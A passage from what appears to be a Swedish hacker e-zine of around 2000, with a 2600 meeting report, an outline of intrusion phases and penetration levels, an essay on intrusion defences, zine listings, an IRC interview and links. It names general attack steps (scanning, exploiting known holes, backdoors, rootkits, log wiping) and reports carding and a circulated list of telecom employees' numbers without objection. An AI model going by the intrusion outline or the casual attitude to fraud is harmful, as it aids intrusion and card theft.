skaper, så kallade datorvirus. Hårda Tinkers Någon som > >hackar< < hårdvara brukar kallas tinkers. Med andra ord : undersöker dolda funktioner eller okända brister i datorernas konstruktion. En tinker bygger inte sällan sin egen dator med otagliga specialfunktioner. -=- Bara att hitta sin egna lilla grupp. Nja, är allt svart/vitt i underground scenen? Skulle inte tro det. Hasses försök att dela in alla i olika grupper håller inte nå vidare, för alla som hållit på ett tag med något av det ovanstående vet att det är mer eller mindre omöjligt att bara hålla sig till en eller två subkulturer enbart. (undantag för spammers, som bör halshuggas). Texten presenteras i samarbete med Team DreamVizion. ////////////////////////////////////////////////////////////////// \ \ / "Mathematic is the language of nature" / \ \ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ////////////////////////////////////////////////////////////////// |11. 2600seGBG Gotrex | \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Jag hade bestämt med zaph0x att vi skulle träffas innan så vi tog en burgare och snackade lite om allt möjligt..sedan så går vi och möter alla vid nils ericssons terminalen... där är typ är neodym, stainless, d_l0rd, master_od och en hel del andra som talade för tyst för att jag kunde uppfatta alla dom rätta stavelserna.. Jag sa till dom som har hand om högtalaren att det var flera personer till hörande "grupp 2600" skulle träffas under den stora tavlan så ropade dom ut det..det var kul.. jag gick och staljade med min ny in- köpta 2600 t-shirt.. den hade en bra effekt att de flesta påsåvis såg den och visste att dom hade hittat rätt.. vi gick sedan i samlad trupp upp till vasaparken.. (ligger en liten bit från avenyn bland annat) Försökte vara lite social iaf och presentera mig... det gick väl sådär :D på vägen träffade jag en gammal lärare (typiskt) och hon undrade nog vad jag gjorde med alla dom där halv skumma människorna och nån träffade nån som dom kände som jobbade på telia.. Därefter satte sig alla nästan i en ring.. (jag gissar på att vi var ungefär 15-17 pers). kanske t.om 20 pers. eftersom det var några som gick ganska snabbt.. alla presenterade sig .. nya namn jag kommer ihåg Darknite, filt, paradoxx, jerm tha sperm, axwell, MeglaW.. stavningen är inte på topp nu .... det var mest några modiga som försökte prata ..inför alla... frågan var hela tiden.. vad gör vi nu då? MeglaW skickade runt en först en lista med felia anställdas tele- fonnummer och ett kort för att komma in till, för mig ett nytt ord, 'telia borgen'. som vi senare gjorde utflykt till ... sedan började många titta nån civil polis men vi såg nog ingen... vissa berättade också att dom hade cardat en diamant och matrox saker för en hel del.. sedan ringde Zitech tror jag till och snackade med MeglaW och master_od. de snackade lite om vad dom olika sysslade med och hur många det var på respektive möte MeglaW ringde 112 för att det var för lite poliser där.. vi kände oss inte så säkra :P ... sedan gick vi till den där 'telia borgen' som är ett riktigt stort sten hus och MeglaW pekade ut att nummerupp- lysningen som var där eller nåt sånt.. Gruppfoton togs och sedan splittrades vi och några gick.. resten fick till kebab grillen och käkade kebab.. sedan tog mötet slut ca: 20:00 jag föreslog att nästa möte skulle äga rum i nån mc donalds eller burger king och nästa mötets tema skulle vara ("Kunskap?") att alla tar med sig lite roliga attribut m.m t.ex. som DarkNite skulle ta med sig alla nummer av 2600 pappers tidningarna. ////////////////////////////////////////////////////////////////// \ \ / ######## ######## ######## ######## / \ ########## ########## ########## ########## \ / ### ### ### ### ### ### ### ### / \ ### ### ### ### ### ### \ / ### ######### ### ### ### ### / \ ### ### ### ### ### ### ### \ / #### ### ### ### ### ### ### ### / \ ########## ########## ########## ########## \ / ######### ######## ######## ######## / \ [ - 2 6 0 0 N E T - ] \ / irc.2600.net / \ \ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ | 12. Faserna i ett IT-anfall Zynta^x | \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Hur arbetar egentligen en "cracker" när han tar sig in i t ex ett nytt system?? Har han nån plan, strategi, speciellt till- vägagångs sätt.. hmm ja oftast så e det på samma sorts väg alla arbetar på. Jaja ni kanske tycker jag tjatar för mycket och det kanske låter lite väl dramatiskt, men det beror enbart på att jag tänker på hur många kebab tallrikar Ncode har käkat. Och så grymma arbete med att lägga ner cisco servrar. Så back to Work ;) Vi ska nu gå igenom ett sätt (strategi) som många använder och som oftast fungerar. Fas .1 Informationsinsamling. Crackern samlar information om måldatorn som är allmänt tillgängligt. WWW och News kan innehålla mycket infor- mation om ett annat datorsystem. Denna fas kan ta ganska lång tid. Fas .2 Crackern bestämmer vilken typ av dator och vilket operativsystem "målet" har.Han tar reda på måldatorns tjänster. Detta kan göras med sk port scanners, program som undersöker trafiken på mål- datorns portar. [Ed.'s note: Läs Ncodes "Säkerhets analys av en Unix Burk" på http://www.2600hz.net/]. Fas .3 Han letar fel och brister i det operativsystem och andra tjänster som måldatorn kör. Många crackers har en lista med kända säkerhetshål. Fas .4 Crackern laddar ner attackverktyget från någon annan server och skriver in rätt kommandon till verktyget eller skickar dem direkt till tjänsten i måldatorn. Han improviserar om någon försökt täppa till hålet. Nu får crackern visa hur skicklig han är. Fas .5 Om attacken lyckades, kan han installera bakdörrar, rootkits, sniffers eller stjäl och förstör data. Han städar upp alla spår i loggar så att intrånget inte syns. Om attacken misslyckades, börjar han om från en tidigare fas. zyntax@SweHPA.com ////////////////////////////////////////////////////////////////// \ \ / "Att hacka handlar inte om att lyckas, det handlar mer om / \ att upptäcka. Även om det skulle finnas något som hette \ / fullständig säkerhet, kommer det alltid att finnas nya / \ system, nya uppfinningar, nya attackvägar. Hackern är \ / nödvändig för att förbättra säkerheten, och vi blir inte / \ så lätt uttråkade." \ / - Emmanuel Goldstein, 2600: The Hacker Quarterly / \ \ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ | 13. Datorsystemets Penetreringsnivåer Zynta^x | \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Varje attack kan bestå av flera steg där man bryter sig djupare och djupare in, ungefär som att gräva en tunnel. ***************************************************************** Nivå .1 -Denial Of Service attacker- ***************************************************************** Nivå ett är hindrande av tjänst och innebär ett tillfälligt stopp av en dator genom att få den att krascha eller att gå väldigt långsamt. ***************************************************************** Nivå .2 -Lokal användare kan läsa- ***************************************************************** Här har man skaffat sig ett användarnamn på datorn inklusive ett hembibliotek och allt vad det innebär. Man kan läsa en del filer, ibland också känsliga systemfiler. ***************************************************************** Nivå .3 -Lokal användare kan skriva- ***************************************************************** "Behörighet" att inte bara skriva filer i sitt eget hembibliotek utan även i en del känsliga bibliotek, som t ex webserverns bibliotek för cgi-script. ***************************************************************** Nivå .4 -Yttre angripare kan köra begränsade kommandon- ***************************************************************** "Behörighet" att köra vissa kommandon eller program på datorn. Ofta utan inloggning. Man kan även påverka datorns inre systemtillstånd. ***************************************************************** Nivå .5 -Yttre angripare kan köra alla kommandon och program- ***************************************************************** Man kan köra alla program på datorn, samt läsa och skriva var man vill, och utan större problem gå till Nivå .6 ***************************************************************** Nivå .6 -Root eller Administratör. (Fulla behörigheter)- ***************************************************************** Datorn är helt crackad. Angriparen har full tillgång till hela datorn och kontrollerar den fullständigt. zyntax@SweHPA.com ////////////////////////////////////////////////////////////////// \ / / "Fantasi är viktigare än kunskap" \ \ - Albert Einstein" / / \ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ | 14. Bra metoder för att förhinda dataintrång Zynta^x | \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ haha jag drömde att min far sade till mig -hördudu Zynta^x en riktig hacker lämnar inga spår efter sig. Bara amatörerna blir rubliker. Så därför tänkte jag nu skriva om hur du kan skydda dig mot just dataintrång. Idag är datorer en jävligt stor del av världens infra- struktur. Så det är ju ganska viktigt att skydda dom också.... Nu är det ju så att dom flesta system är nätverksbaserade och uppkopplade via förmedlande protokoll som t ex TCP/IP vilket gör det lätt att ansluta sig till ett sådant system. Då måste vi alltså skydda nätverksanslutna datorer genom att *tillhanda hålla logiska skydd mot den yttre omgivningen. *använda kryptering och stark autentisering. *logiskt försvara individuella värddatorer(hosts). Nedan beskrivs ett antal inriktningar för att förbättra skyddet mot intrång. Beskrivningar anger bara några av de viktigaste åtgärder man bör känna till. +Brandväggar. Brandväggar, kan vara ett bra initialt skydd för ett nätverksanslutet datorsystem, men det vanligaste problemet med dessa är brandväggens många inställningsmöjligheter som gör att de lätt kan bli felinställda t ex genom att: *tillåta vad som helst från vem som helst, the goof up. *släppa igenom farliga tjänster *ha låg säkerhet som förval t ex genom att ha ett domain name system, DNS ger ifrån sig viktig information som underlättar ett intrång eller att låta internet control message protocol, ICMP ge sådan information så att den tipsar en hacker om systemets möjligheter. *tillåta åtkomst av interna nätverkstjänster såsom fjärrin- loggning, e-post, filöverföring m.m utan stark autentisering. Ingen brandvägg är den andra lik. Det finns fyra populära teknologier. Oftast är den hybrid av flera produkter: *normal enkel paketfiltrering, filtrerande router - som svagast *portbegränsning, socket relays - marginellt bättre *intelligentare paketfiltrering (FW-1), en rejäl förbättring men fortfarande problematisk *analys av innehåll, application gateway - säkrare men långsammare. +System för upptäckt av intrång. System för upptäckt av intrånget kallas "intrusion detecting systems, IDS". Det används för att detektera kända mönster som kan påvisa att det pågår ett försök till intrång eller att ett intrång redan genomförts. IDS finns i olika varianter som t ex: *paketsniffare och mönstermatchare (signaturdetektering) *övervakare av kända mönster i loggar *trafikmätare *anomaliupptäckare (händelser som inte borde finnas i systemet) eller detektering av förändringar. Ett IDS-system kan antingen vara en egen värddator eller ett nätverksbaserat system. +Övervakning av uppkopplingar. För att kunna upptäcka intrånget gäller det att övervaka datorsystemet och dess uppkopplingar. Det finns produkter som övervakar och skriver ut aktuella TCP-anslutningar, visar valda anslutningar på en bildskärm eller tar över eller avslutar en utvald anslutning. Ett problem med detta är dom juridiska aspekterna på övervakning och visa lösenord eller annan känslig information. +Inbrottslarm. Ett logisktinbrottlarm är en del i ett flernivåskydd. Om brandväggen passeras av en angripare bör ett larm reagera på aktiviteter innanför brandväggen. Larmet bör varna för aktiviteter som inte borde hända vid just den tidpunkten eller i den "formen". +Personal och logging. Kunnig och utbildad personal är ett måste för effektiva motåtgärder. Mänsklig reaktion på larm ska finnas och det kan inte påpekas tillräckligt ofta att en logg av aktiviteter är ytterst viktig för effektiva motåtgärder. Loggen måste ständigt övervakas av det mänskliga ögat för att man ska kunna upptäcka intrång och intrångsförsök. +Uppdateringar. Det är mycket viktigt att hänga med i intrångsutvecklingen eftersom det dagligen upptäcks nya sätt att ta sig in i system. En av de viktigaste förutsättningarna för att hack- are ska ligga steget före är att de snabbt och effektivt kan byta information med likasinade. JU FLER SOM HJÄLPS ÅT desto större är sannolikheten att de ska lyckas. Ett effektivt skydd bör därför bestå av en motsvarande öppen informationsspridning mellan de som försöker skydda systemen. Ju mer information som utväxlas mellan parter om intrång och intrångsförsök, desto större är chansen att förhindra nya angrepp. Detta leder då till att öppna och icke kommersiella programvaror är att föredra eftersom fler kan analysera dessa och hitta sårbarheter som kan delas öppet med andra. +Engångslösenord. Engångslösenord gör sniffning, knäckning och lösenordsstöld ineffektiv. Tvåfaktorssytem (någonting du vet och någonting du har eller är), t ex en PIN-kod tillsammans med en lösenords- genererare, ger stark autentisering. Det problem som kan finnas med engångslösenord är stora kostnader för im- plementeringen och administreringen och att skydda autent- iseringsservern mot intrång. +Engångsloggning. Engångsloggning, single sign on, kombinerad med stark autent- isering ger ännu bättre säkerhet via en centraliserad kontroll och logging av nätverksbaserad aktivitet. Med engångsloggning menas att man bara loggar in på ett ställe med ett lösenord (säkerhetsserver), för att sedan få tillgång till flera olika system, i motsats till att logga in i olika system med olika lösenord. Engångsinloggning är säkrare och smidigare. +Kryptering. Kryperingsteknik är i sig ingen lösning, men en del av flera lösningar som kan användas som motmedel mot intrång. Teknikerna *secure socket layer(SSL) *secure shell (SSH) *virtual private network (VPN) skyddar data under dess transport mellan system och förhindrar lösenordssniffning och dataläsning. Återskapande av ett intrång. Om ett intrång har skett måste man få fram material för eventuell polisutredning (hehe lol eller hur) och återställa systemet till det skick det hade innan intrånget skedde. För att ta reda på vad som har hänt fram tills dess att intrånget skedde, gäller det att logga nätverksaktiviteter som sker och ta en ögonblicksbild av systemets inställninga när intrånget skedde. En strategi för återskapande av ett system efter intrång omfattar ungefär så här: *att ändra samtliga användares lösenord(efter att en sniffer upptäckts) *att ominstallera systemprogramvaran (eller ändra delar av den, om det finns en ögonblicksbild) *att åtgärda aktuella sårbarheter. +Spåra intrång. Att spåra intrång är en indirekt metod för att förhindra framtida intrång genom att hitta och åtala en angripare (hmm ;( ) Det är endast den naiva och okunniga angriparen som jobbar från sin egen hemadress och hemdator. En proff- esionell angripare "tvättar" anslutningar genom att bryta sig in i oskyddade system och använda dessa som språngbräda mot andra system. Det gör att en sådan angripare kan vara omöjlig att hitta. I pressen ser man ofta att tonåringar (alltså vi :) ) gjort intrång. De har förmodlingen inte varit tillräckligt skickliga att dölja sina spår. De riktigt stora lagbrytarna lär vara ytterst svåra att finna utan ett speciellt skickligt och tidskrävande utredningsarbete. Vid spårning av ett angrepp, börjar man vanligtvis med käll IP-adressen, ifall det inte är denial of service-angrepp som normalt förfalskar IP-adresser eller använder personers adresser. Använd därför först din dators egna informationsfunktioner för att hitta angriparens tekniska anslutning vilket är det företag som tillhandahåller Internetanlutningen till källnätverket. Du kan t ex använda en nätbläddrare för att hitta anslutningspunkten för angreppet. Kontakta därefter din Internetleverantör du hittat i din logg och begär hjälp. Det visar sig då oftast att du får upprepa denna process eftersom det troligtvis är flera leverantörer inblandade.... zyntax@SweHPA.com ////////////////////////////////////////////////////////////////// \ \ / "Hey, hey, hey - be careful out there..." / \ \ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ | 15. Svenska h/p zines A till Ö Gotrex | \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Dessa zines finns nu på vår sida. De är speciellt utvalda men om det finns nåt *bra* svenskt h/p zine som saknas så låt mig veta. http://members.xoom.com/_XMCM/msadf/zines Digital Wannabee's n/a Flashbacks News Agency http://www.flashback.se Gothenburg Secret Service http://www.GothenburgSecretService.net (http://members.xoom.com/_XMCM/msadf/) Guide To (mostly) Harmless Hacking [svensk översättning] http://w1.340.telia.com/~u34002171/hhd.html Klan of the BloodStained Blade n/a Kryptorama http://go.to/Kryptorama Liberalt Oorganiserat Drägg n/a Masters Of Information n/a Mr. Headache's Underground http://www.mrheadachesmagazine.com Outlaw Informativa http://www.2600hz.net/ PFA http://www.zaph0x.com TheRentor n/a Several Errors Hidden http://c5.hakker.com/seh/ Swedish Phreakerz Association n/a STREETWHORE http://www.teliasuger.com Swehack Underground Zine http://swehack.cjb.net The Aberrants Zine n/a TheNetw0rk Zine http://www.thenetw0rk.cjb.net/ THE SWEDISH UNDERGROUND EROTIC E-ZINE from Heretics Inc http://www.2600hz.net/ United Phreakers of $weden http://www.upos.cjb.net Vanliga Svenska Priikers n/a West Swede Priiker Alliated n/a ////////////////////////////////////////////////////////////////// \ / / "If your goal is to understand your network from a 40,000- \ \ foot view, then Windows port scanning tools will suffice. / / But if you're serious about your security and looking for \ \ the holes that crackers will find, then take the time to / / install a Linux box and use nmap." \ \ - Infoworld / / \ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ | 16. Intervju med pewp ang. S&S artikeln Gotrex | \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ *disskusion om den kontroversiella artikeln i Säkerhet & Sekretess* <Gotrex> är det du på din bild? <Gotrex> asså den svarta <pewp> japp, passfoto <Gotrex> bra att veta, typ <pewp> hehe, varför det <pewp> man ser inget juh <pewp> men jag kommer försvinna <Gotrex> för då vet dom vad du heter <Gotrex> försvinna? <pewp> inget IRC mer för mig mer <Gotrex> hokus pokus <pewp> nej jag ringde och snackade med dom, de vet ALLT om mig <pewp> hokus pokus, ingen pewp längre <Gotrex> allvarligt? <Gotrex> vad sa dom då? <pewp> japp... <Gotrex> har dom nån anledning till det? <pewp> de sa förmycket <Gotrex> frågan är inte om det enbart är för att skrämmas den här artikeln.. <pewp> tror inte det, de visst förmycket <Gotrex> men vadådå? <Gotrex> har dom några bevis? <pewp> jag vet att det är sant <Gotrex> ingen har fått fängelse för dator relaterade brott..[lite fel formulerat så här i efterhand] <Gotrex> ännu.. <pewp> jag har inte hackat en sida, jag har kollat över säkerheten och sedan mailat sysadm <pewp> det är så jag jobbar <pewp> jag är en hacker, ingen cracker, script kiddie, wannabe, newbie <pewp> jag har hållt på med hacking i över 7 år <pewp> jag har inte hackat en sida nåfonsin <pewp> jag är en whitehat <Gotrex> då så.. varför dra.. <pewp> vill inte att folk ska spoinera på mig <pewp> jag kanske kommer tillbaka med ett annat namn <pewp> men pewp e borta <Gotrex> mm <Gotrex> yförsig <pewp> kommer byta ISP, inte snacka med mina polare på IRC mer <Gotrex> får jag publicera det här? <pewp> jag e paraniod, TRUST NO ONE <pewp> jag vill inte ha folk som snokar i mitt liv <pewp> varför ska du publisera detta <pewp> vad ska det göra för nytta ? <Gotrex> undra vaför just ni 16 pers. var med där? <pewp> om du har en vettig anledning så kanske jag går med på det <Gotrex> pewps reaktions på artikeln :P <Gotrex> det här samtalet säger allt..typ [mycket iaf] <Gotrex> dom har väl förmodligen kollat upp lite folks isp och fått namnet där ifrån <pewp> Du, jag har varit med i scenen så länge så jag blev inte förvånad, jag hänger med världens största hacker grupper, jag har gjort så mycket i den svenska hacking scenen, inte som pewp utan som ett annat namn, jag sitter med i sveriges elite på andra nät än dalnet... <pewp> det förvånar inte mig... <Gotrex> vilka? <Gotrex> yförsig alla har ganska 'tunga' bakgrunder.. <pewp> LoU, VMM, synnergy, och en massa andra. Men jag skiter i vad dom gör, det är bara mina kompisar, jag är en white hat <pewp> jag var inte äns där <pewp> men jag har varit med i så mycket annat så det förvånar inte mig... <Gotrex> var du inte ens där? strange .. (jag var inte där hellerbtw) <pewp> DU kan juh hälsa att att oldskool pewp har försvunnit pga denna trams grejjen. <Gotrex> publicerar den här loggen.. de som läser den får veta.. <pewp> ok lugnt, jag drar nu <pewp> hejdå ha ett bra liv <pewp> vi kanske syns ngn gång... <Gotrex> tack det samma [hej då? :P] *[ kommentarer vid redigering ] ////////////////////////////////////////////////////////////////// \ / / "Det finns inga problem, bara lösningar." \ \ - diox @#phreakerz :P / / \ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ////////////////////////////////////////////////////////////////// | Länkar Gotrex | \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ http://www.rttcrew.com/ Reclaim The Telephones http.//www.wallarea.com/ Svenska underground nyheter http://www.2600se.com Svenska 2600 http://www.insecurefoundation.cjb.net Svensk H/P http://www.teliasuger.com Streetwhore http://www.2600hz.net/ Heretics Inc http://www.avlyssning.nu/ http://www.splitsecond.nu/ members.xoom.com/_XMCM/msadf/zines/ GSS zines sektion http://user.tninet.se/~dcy752g/ Artikel om 2600 mötet http://scene.textfiles.com/ Internationella Ezines http://www.2600.com En klassiker http://forbidden.net-security.org/ http://www.hack.co.za/ http://www.pots.gr http://207.253.202.66 NTWAk0s wargame (NT) http://213.112.7.132 Dumones wargame (Unix) http://www.hackerslab.org http://www.hacksdmi.org/ http://www.fastpris.cjb.net Protestera mot spray http://hem.fyristorg.com/ecco/ Kul! ___,,,^..^,,,___ ////////////////////////////////////////////////////////////////// \ \ / Nu finns vi på: / \ http://www.GothenburgSecretService.net \ \ (http://members.xoom.com/_XMCM/msadf/) / / \ \\\\\\\\\\\\\\\\\\\\\\\\\\\THE\END\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\